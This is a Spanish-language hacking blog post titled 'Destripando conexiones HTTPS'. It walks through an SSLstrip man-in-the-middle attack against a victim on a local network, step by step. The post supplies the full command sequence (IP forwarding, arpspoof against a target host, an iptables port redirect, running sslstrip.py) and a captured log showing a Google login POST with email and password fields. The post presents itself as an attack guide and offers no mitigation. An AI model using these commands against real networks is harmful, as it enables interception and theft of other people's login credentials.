HTTPS se considera uno de los protocolos de envío de información por web más seguros, sin embargo y como se suele decir, no es oro todo lo que reluce. En este post voy a presentar una herramienta, SSLstrip, que permite justamente hacer eso, destripar una conexión HTTPS y conseguir ver el contenido transmitido en texto plano.
SSLstrip permite sniffar usuarios y contraseñas transmitidas por HTTPS de forma sencilla. Para realizar el ataque únicamente llega con usar una técnica man-in-the-middle. El equipo intermedio observará todo el tráfico en texto plano.
SSLstrip permite sniffar usuarios y contraseñas transmitidas por HTTPS de forma sencilla. Para realizar el ataque únicamente llega con usar una técnica man-in-the-middle. El equipo intermedio observará todo el tráfico en texto plano.
¿Cómo?
- Descargar SSLstrip.
- Realizar el ataque MITM.
- Observar el tráfico HTTPS de interés.
Todos los comandos serán ejecutados desde la máquina con IP192.168.1.2.
La última versión de SSLstrip es la 0.7. Para descargarla:
Lo descompimimos y tenemos una nueva carpeta, sslstrip-0.7. Accedemos a ella y desde ahí seguimos con todo el proceso.
Cita:
tar zxvf sslstrip-0.7.tar.gz cd sslstrip-0.7/ |
Cita:
echo "1" > /proc/sys/net/ipv4/ip_forward |
Cita:
arpspoof -i eth0 -t 192.168.1.33 192.168.1.1 |
Cita:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 |
Cita:
./sslstrip.py -w captura.cap |
Cita:
tail -f captura.cap 2010-09-28 01:35:046,739 SECURE POST Data (www.google.com): ltmpl=default<mplcache=2&continue=http%3A%2F%2Fm ail.google.com%2Fmail%2F%3F&service=mail&rm=false& dsh=6669774865561864179<mpl=default<mpl=defaul t&scc=1&timeStmp=&secTok=&GALX=dPSLG5jykg8&a mp;Email=user_prueba&Passwd=mi_passwd&rmShown=1&si gnIn=Acceder&asts= |
By; Sirius Hack
0 Response for the "Destripando conexiones HTTPS"
Publicar un comentario